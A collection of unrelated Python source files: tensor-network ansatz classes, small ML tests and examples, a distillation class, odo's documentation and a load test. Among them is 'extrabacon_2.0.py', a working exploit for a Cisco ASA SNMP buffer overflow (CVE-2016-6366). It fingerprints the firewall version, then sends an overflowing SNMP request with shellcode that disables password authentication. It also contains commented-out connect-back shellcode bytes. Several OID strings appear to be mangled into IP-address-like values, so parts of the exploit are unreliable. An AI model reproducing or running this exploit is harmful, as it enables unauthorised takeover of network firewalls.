def __call__(self, diagram: rigid.Diagram) -> tensor.Diagram:
"""Convert a DisCoPy diagram into a DisCoPy tensor."""
return self.functor(diagram)
class MPSAnsatz(TensorAnsatz):
"""Split large boxes into matrix product states."""
BOND_TYPE: Ty = Ty('B')
def __init__(self,
ob_map: Mapping[Ty, Dim],
bond_dim: int,
max_order: int = 3) -> None:
"""Instantiate a matrix product state ansatz.
Parameters
----------
ob_map : dict
A mapping from :py:class:`discopy.rigid.Ty` to the dimension
space it uses in a tensor network.
bond_dim: int
The size of the bonding dimension.
max_order: int
The maximum order of each tensor in the matrix product
state, which must be at least 3.
"""
if max_order < 3:
raise ValueError('`max_order` must be at least 3')
if self.BOND_TYPE in ob_map:
raise ValueError('specify bond dimension using `bond_dim`')
ob_map = dict(ob_map)
ob_map[self.BOND_TYPE] = Dim(bond_dim)
self.ob_map = ob_map
self.bond_dim = bond_dim
self.max_order = max_order
self.split_functor = rigid.Functor(ob=lambda ob: ob, ar=self._ar)
self.tensor_functor = rigid.Functor(
ob=self.ob_map,
ar=super()._ar, ar_factory=tensor.Diagram, ob_factory=tensor.Dim)
def _ar(self, ar: Word) -> rigid.Diagram:
bond = self.BOND_TYPE
if len(ar.cod) <= self.max_order:
return Word(f'{ar.name}_0', ar.cod)
boxes = []
cups = []
step_size = self.max_order - 2
for i, start in enumerate(range(0, len(ar.cod), step_size)):
cod = bond.r @ ar.cod[start:start+step_size] @ bond
boxes.append(Word(f'{ar.name}_{i}', cod))
cups += [rigid.Id(cod[1:-1]), Cup(bond, bond.r)]
boxes[0] = Word(boxes[0].name, boxes[0].cod[1:])
boxes[-1] = Word(boxes[-1].name, boxes[-1].cod[:-1])
return rigid.Box.tensor(*boxes) >> rigid.Diagram.tensor(*cups[:-1])
def __call__(self, diagram: rigid.Diagram) -> tensor.Diagram:
return self.tensor_functor(self.split_functor(diagram))
class SpiderAnsatz(TensorAnsatz):
"""Split large boxes into spiders."""
def __init__(self,
ob_map: Mapping[Ty, Dim],
max_order: int = 2) -> None:
"""Instantiate a spider ansatz.
Parameters
----------
ob_map : dict
A mapping from :py:class:`discopy.rigid.Ty` to the dimension
space it uses in a tensor network.
max_order: int
The maximum order of each tensor, which must be at least 2.
"""
if max_order < 2:
raise ValueError('`max_order` must be at least 2')
self.ob_map = ob_map
self.max_order = max_order
self.split_functor = rigid.Functor(ob=lambda ob: ob, ar=self._ar)
self.tensor_functor = rigid.Functor(
ob=self.ob_map,
ar=super()._ar, ar_factory=tensor.Diagram, ob_factory=tensor.Dim)
def _ar(self, ar: Word) -> rigid.Diagram:
if len(ar.cod) <= self.max_order:
return Word(f'{ar.name}_0', ar.cod)
boxes = []
spiders = [rigid.Id(ar.cod[:1])]
step_size = self.max_order - 1
for i, start in enumerate(range(0, len(ar.cod)-1, step_size)):
cod = ar.cod[start:start + step_size + 1]
boxes.append(Word(f'{ar.name}_{i}', cod))
spiders += [rigid.Id(cod[1:-1]), Spider(2, 1, cod[-1:])]
spiders[-1] = rigid.Id(spiders[-1].cod)
return rigid.Diagram.tensor(*boxes) >> rigid.Diagram.tensor(*spiders)
def __call__(self, diagram: rigid.Diagram) -> tensor.Diagram:
return self.tensor_functor(self.split_functor(diagram))
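# Hedged usage sketch (added for illustration; not part of the original file).
# The toy sentence diagram and the dimensions below are assumptions chosen
# only to exercise the ansatz classes defined above.
def _example() -> None:
    n, s = Ty('n'), Ty('s')
    words = Word('Alice', n) @ Word('runs', n.r @ s)
    diagram = words >> (Cup(n, n.r) @ rigid.Id(s))
    # Plain tensor ansatz: every n- and s-wire is mapped to dimension 2.
    print(TensorAnsatz({n: Dim(2), s: Dim(2)})(diagram))
    # MPS ansatz: boxes wider than `max_order` are split into a chain of
    # tensors joined by bond wires of size `bond_dim`.
    print(MPSAnsatz({n: Dim(2), s: Dim(2)}, bond_dim=3)(diagram))
    # Spider ansatz: wide boxes are split with spiders instead.
    print(SpiderAnsatz({n: Dim(2), s: Dim(2)})(diagram))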
|
test/test_Tracker.py | rentainhe/glasses | 271 | 12688756 | <filename>test/test_Tracker.py
import torch
import torch.nn as nn
from glasses.utils.Tracker import Tracker
def test_tracker():
x = torch.rand(64, 1)
model = nn.Sequential(nn.Linear(1, 64), nn.ReLU(), nn.Linear(64,10), nn.ReLU())
tr = Tracker(model)
tr(x)
assert len(tr.traced) == 4
assert len(tr.parametrized) == 2
|
videoanalyst/data/target/target_impl/utils/debug_compare_densebox_target.py | TragedyN/SiamFCpp | 737 | 12688760 | <reponame>TragedyN/SiamFCpp<gh_stars>100-1000
import numpy as np
# from IPython import embed;embed()
from make_densebox_target import \
make_densebox_target as make_densebox_target_old
from make_densebox_target_dev import \
make_densebox_target as make_densebox_target_new
gt_boxes = np.asarray([[150, 250, 130, 60, 1]])
config_dict = dict(
x_size=303,
score_size=17,
total_stride=8,
score_offset=(303 - 1 - (17 - 1) * 8) // 2,
)
target_old = make_densebox_target_old(gt_boxes, config_dict)
target_new = make_densebox_target_new(gt_boxes, config_dict)
for v_old, v_new in zip(target_old, target_new):
v_new = v_new.numpy()
# uncomment the next line to inspect tensors in detail
# from IPython import embed;embed()
np.testing.assert_allclose(v_new, v_old, atol=1e-6, verbose=True)
print("Values closed.")
|
examples/undocumented/python/kernel_simple_locality_improved_string.py | tallamjr/shogun | 2,753 | 12688829 | <gh_stars>1000+
#!/usr/bin/env python
import shogun as sg
from tools.load import LoadMatrix
lm=LoadMatrix()
traindat = lm.load_dna('../data/fm_train_dna.dat')
testdat = lm.load_dna('../data/fm_test_dna.dat')
parameter_list = [[traindat,testdat,5,5,1],[traindat,testdat,5,3,2]]
def kernel_simple_locality_improved_string (fm_train_dna=traindat,fm_test_dna=testdat,
length=5,inner_degree=5,outer_degree=1):
feats_train=sg.create_string_features(fm_train_dna, sg.DNA)
feats_test=sg.create_string_features(fm_test_dna, sg.DNA)
kernel=sg.create_kernel("SimpleLocalityImprovedStringKernel", length=length, inner_degree=inner_degree, outer_degree=outer_degree)
kernel.init(feats_train, feats_train)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('SimpleLocalityImprovedString')
kernel_simple_locality_improved_string(*parameter_list[0])
|
imodels/util/distillation.py | csinva/interpretability-implementations-demos | 102 | 12688841 | from sklearn.base import RegressorMixin, BaseEstimator, is_regressor
class DistilledRegressor(BaseEstimator, RegressorMixin):
"""
Class to implement distillation. Currently only supports regression.
Params
------
teacher: initial model to be trained
must be a regressor or a binary classifier
student: model to be distilled from teacher's predictions
must be a regressor
"""
def __init__(self, teacher: BaseEstimator, student: BaseEstimator,
n_iters_teacher: int=1):
self.teacher = teacher
self.student = student
self.n_iters_teacher = n_iters_teacher
self._validate_student()
self._check_teacher_type()
def _validate_student(self):
if is_regressor(self.student):
pass
else:
if not hasattr(self.student, "prediction_task"):
raise ValueError("Student must be either a scikit-learn or imodels regressor")
elif self.student.prediction_task == "classification":
raise ValueError("Student must be a regressor")
def _check_teacher_type(self):
if hasattr(self.teacher, "prediction_task"):
self.teacher_type = self.teacher.prediction_task
elif hasattr(self.teacher, "_estimator_type"):
if is_regressor(self.teacher):
self.teacher_type = "regression"
else:
self.teacher_type = "classification"
def set_teacher_params(self, **params):
self.teacher.set_params(**params)
def set_student_params(self, **params):
self.student.set_params(**params)
def fit(self, X, y, **kwargs):
# fit teacher
for iter_teacher in range(self.n_iters_teacher):
self.teacher.fit(X, y, **kwargs)
if self.teacher_type == "regression":
y = self.teacher.predict(X)
else:
y = self.teacher.predict_proba(X)[:, 1] # assumes binary classifier
# fit student
self.student.fit(X, y)
def predict(self, X):
return self.student.predict(X)
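# Hedged usage sketch (illustration only; not part of the original module).
# It assumes scikit-learn is installed; any teacher/student pair with the
# usual fit/predict API should behave the same way.
if __name__ == '__main__':
    from sklearn.datasets import make_regression
    from sklearn.ensemble import RandomForestRegressor
    from sklearn.tree import DecisionTreeRegressor
    X, y = make_regression(n_samples=200, n_features=5, random_state=0)
    distiller = DistilledRegressor(
        teacher=RandomForestRegressor(n_estimators=50, random_state=0),
        student=DecisionTreeRegressor(max_depth=3, random_state=0))
    distiller.fit(X, y)  # teacher fits on y; student fits on the teacher's predictions
    print(distiller.predict(X[:5]))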
|
extrabacon-2.0/extrabacon_2.0.py | JS-Burns/CVE-2016-6366 | 171 | 12688860 | <gh_stars>100-1000
#!/usr/bin/env python2
"""
Our goal with version 2.0 of ExtraBacon is to support more ASA versions, as well
as simplify the Python and payload shellcode. This means stripping as much as
possible from the shellcode and Python to still be functional.
"""
import sys
import string
import subprocess
import binascii
import random
import datetime
improved_dir = "./improved"
sys.path.insert(0, '..')
from Mexeggs.all import *
from Mexeggs import *
from scapy.all import *
##
##
##
class ExtrabaconInfoSubcommand(sploit.InfoSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconInfoSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
def run(self, exp):
super(ExtrabaconInfoSubcommand, self).run(exp)
##
##
##
##
class ExtrabaconExecSubcommand(sploit.ExecSubcommand):
expect_filename_argument = False ##
def setup_parser(self, parser):
super(ExtrabaconExecSubcommand, self).setup_parser(parser)
self.parser = parser
##
for a in self.parser._actions:
if a.dest == "version":
a.choices = ['v2c']
a.help = 'SNMP version (v2c only)'
self.parser.add_argument('--mode',
help='select mode of operation',
choices=["pass-disable", "pass-enable", "mettle"],
required=True,
default=None)
self.parser.add_argument('--msg',
help='print success message on console of target (DO NOT USE)',
dest='msg',
action='store_true',
required=False,
default=False)
def run(self, exp):
super(ExtrabaconExecSubcommand, self).run(exp)
class Extrabacon(Sploit):
def setup_parser(self):
super(Extrabacon, self).setup_parser()
##
self.add_subcommand(ExtrabaconInfoSubcommand())
##
self.add_subcommand(ExtrabaconExecSubcommand())
##
##
def generate_touch(self):
return SNMP(version = self.params.version,
community = self.params.community,
PDU = SNMPget(varbindlist = [SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.1.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.3.0')),
SNMPvarbind(oid = ASN1_OID('1.3.6.1.2.1.1.5.0'))]))
def fw_version_check(self, vers_string):
# let's try a more generic approach
version = vers_string.split("Version ")[1]
version = version.replace(".", "_")
# well this is crappy
fname = improved_dir + '/shellcode_' + version + '.py'
if not os.path.isfile(fname):
return "unsupported"
return version
def post_touch(self, response):
##
##
values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
if not values:
return False
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
fw_uptime = values[1]
fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
print
print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
print
fw_name = values[2]
print "[+] firewall name is %s" % fw_name
print
fw_vers = self.fw_version_check(values[0])
if fw_vers != "unsupported":
print "[+] target is running %s, which is supported" % fw_vers
else:
print "[-] target is running %s, which is NOT supported" % values[0]
self.key_data = fw_vers ##
if self.params.verbose:
print 'Data stored in key file : %s' % self.key_data
##
##
return True
def load_vinfo(self):
self.vinfo = self.key_data.upper()
if self.params.verbose:
print 'Data stored in self.vinfo: %s' % self.vinfo
def report_key(self, key):
print "\nTo check the key file to see if it really contains what we're claiming:"
print "# cat %s" % self.get_key_file(key = key)
if self.key_data.lower() == "unsupported":
return
print "\nTo disable password checking on target:"
print "# %s exec -k %s %s --mode pass-disable" % (self.env.progname, key, " ".join(self.params.args[2:]))
print "\nTo enable password checking on target:"
print "# %s exec -k %s %s --mode pass-enable" % (self.env.progname, key, " ".join(self.params.args[2:]))
##
##
##
print
def generate_exploit(self):
if not self.params.mode:
print "[-] no mode selected!"
sys.exit(1)
print "[+] generating exploit for exec mode %s" % self.params.mode
if self.key_data.lower() == "unsupported":
print "[-] unsupported target version, abort"
sys.exit(1)
if os.path.exists(improved_dir):
print "[+] using shellcode in %s" % improved_dir
sys.path.insert(0, improved_dir)
else:
print "[-] cannot find %s" % (improved_dir)
sys.exit(1)
self.sc_filename = "shellcode_%s" % self.key_data.lower()
print "[+] importing version-specific shellcode %s" % self.sc_filename
try:
sc = __import__(self.sc_filename)
except:
print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
sys.exit(1)
##
# cufwUrlfServerStatus + .9
head = '172.16.17.32.4.1.9.9.491.1.3.3.1.1.5.9'
head_len = len(head.split('.'))
# do we patch, or restore original code
if self.params.mode == 'pass-disable':
always_true_code = "192.168.127.12"
pmcheck_bytes = always_true_code
admauth_bytes = always_true_code
else:
pmcheck_bytes = sc.pmcheck_code
admauth_bytes = sc.admauth_code
preamble_snmp = ""
preamble_snmp += "172.16.17.32.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187."
preamble_snmp += sc.pmcheck_bounds
preamble_snmp += ".205.128.88.187."
preamble_snmp += sc.admauth_bounds
preamble_snmp += ".205.128.199.5."
preamble_snmp += sc.pmcheck_offset
preamble_snmp += "."
preamble_snmp += pmcheck_bytes
preamble_snmp += ".199.5."
preamble_snmp += sc.admauth_offset
preamble_snmp += "."
preamble_snmp += admauth_bytes
preamble_snmp += ".97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".12172.16.17.32.11.15.15.15.137.229.131.197."
preamble_snmp += sc.fix_ebp
preamble_snmp += ".204.195"
if self.params.mode == 'mettle':
preamble_snmp = "172.16.17.32.49.201.49.192.96.49.210."
buf = ""
#buf += "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd"
#buf += "\x80\x97\x5b\x68\x0a\x1e\x0a\x89\x66\x68\x11\x5c\x66"
#buf += "\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd"
#buf += "\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80"#\xff\xe1"
for c in buf:
preamble_snmp += "%d." % int(binascii.hexlify(c), 16)
preamble_snmp += "97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197.72.195"
wrapper = preamble_snmp
wrapper_len = len(wrapper.split('.'))
wrapper += ".144" * (82 - wrapper_len)
##
launcher = "172.16.31.10.139.7.255.224.144"
overflow = string.join([head, "95", wrapper, sc.jmp_esp_offset, launcher], ".")
## removed superfluous length checks
if len(overflow.split('.')) != 112:
print "[-] problem with overflow_len (%d != 112)" % overflow_len
sys.exit(1)
self.params.request_id = random.randint(0x80000, 0x1fffffff)
print "[+] random SNMP request-id %d" % self.params.request_id
# we don't need to fix the launcher offset, only build 1 packet
# also, we can remove the payload varbind
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID(overflow))]
)
)
if self.params.verbose:
print "overflow (112): %s" % overflow
print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))
##
if len(exba_msg) >= 512:
print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
sys.exit(1)
##
##
##
ret_list = [exba_msg]
return(ret_list)
def post_exploit(self, response):
##
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
recv_id = int(snmp.PDU.id.val)
if recv_id == self.params.request_id:
print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
return True
else:
print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
return False
if __name__ == '__main__':
exp = Extrabacon('Extrabacon', '1.1.0.1')
exp.launch(sys.argv)
|
odo/odo.py | farukht/odo | 844 | 12688872 | from .into import into
def odo(source, target, **kwargs):
""" Push one dataset into another
Parameters
----------
source: object or string
The source of your data. Either an object (e.g. DataFrame),
or a string ('filename.csv')
target: object or string or type
The target for where you want your data to go.
Either an object, (e.g. []), a type, (e.g. list)
or a string (e.g. 'postgresql://hostname::tablename')
raise_on_errors: bool (optional, defaults to False)
Raise exceptions rather than reroute around them
**kwargs:
keyword arguments to pass through to conversion functions.
Optional Keyword Arguments
--------------------------
Odo passes keyword arguments (like ``sep=';'``) down to the functions
that it uses to perform conversions (like ``pandas.read_csv``). Due to the
quantity of possible optional keyword arguments we can not list them here.
See the following documentation for your format
* AWS - http://odo.pydata.org/en/latest/aws.html
* CSV - http://odo.pydata.org/en/latest/csv.html
* JSON - http://odo.pydata.org/en/latest/json.html
* HDF5 - http://odo.pydata.org/en/latest/hdf5.html
* HDFS - http://odo.pydata.org/en/latest/hdfs.html
* Hive - http://odo.pydata.org/en/latest/hive.html
* SAS - http://odo.pydata.org/en/latest/sas.html
* SQL - http://odo.pydata.org/en/latest/sql.html
* SSH - http://odo.pydata.org/en/latest/ssh.html
* Mongo - http://odo.pydata.org/en/latest/mongo.html
* Spark - http://odo.pydata.org/en/latest/spark.html
Examples
--------
>>> L = odo((1, 2, 3), list) # Convert things into new things
>>> L
[1, 2, 3]
>>> _ = odo((4, 5, 6), L) # Append things onto existing things
>>> L
[1, 2, 3, 4, 5, 6]
>>> odo([('Alice', 1), ('Bob', 2)], 'myfile.csv') # doctest: +SKIP
Explanation
-----------
We can specify data with a Python object like a ``list``, ``DataFrame``,
``sqlalchemy.Table``, ``h5py.Dataset``, etc..
We can specify data with a string URI like ``'myfile.csv'``,
``'myfiles.*.json'`` or ``'sqlite:///data.db::tablename'``. These are
matched by regular expression. See the ``resource`` function for more
details on string URIs.
We can optionally specify datatypes with the ``dshape=`` keyword, providing
a datashape. This allows us to be explicit about types when mismatches
occur or when our data doesn't hold the whole picture. See the
``discover`` function for more information on ``dshape``.
>>> ds = 'var * {name: string, balance: float64}'
    >>> odo([('Alice', 100), ('Bob', 200)], 'accounts.json', dshape=ds) # doctest: +SKIP
We can optionally specify keyword arguments to pass down to relevant
conversion functions. For example, when converting a CSV file we might
want to specify delimiter
>>> odo('accounts.csv', list, has_header=True, delimiter=';') # doctest: +SKIP
These keyword arguments trickle down to whatever function ``into`` uses
    to convert this particular format, functions like ``pandas.read_csv``.
See Also
--------
odo.resource.resource - Specify things with strings
datashape.discover - Get datashape of data
odo.convert.convert - Convert things into new things
odo.append.append - Add things onto existing things
"""
return into(target, source, **kwargs)
|
scoreboard/bin/stress_test.py | aprilsanchez/ictf-framework | 110 | 12688882 | import unittest
from random import random
from funkload.FunkLoadTestCase import FunkLoadTestCase
from webunit.utility import Upload
from funkload.utils import Data
class Stress_Test(FunkLoadTestCase):
def setUp(self):
self.server_url = self.conf_get('main', 'url')
self.setBasicAuth('<EMAIL>', 'testing!')
pass
def test_simple(self):
# The description should be set in the configuration file
server_url = self.server_url
# begin test ---------------------------------------------
nb_time = self.conf_getInt('test_simple', 'nb_time')
ap_list = self.conf_get('test_simple', 'ap_list').split(",")
#print "aplist,", ap_list
for i in range(nb_time):
for ap in ap_list:
self.get('https://'+server_url+ap, description='Get URL')
# end test ------------
|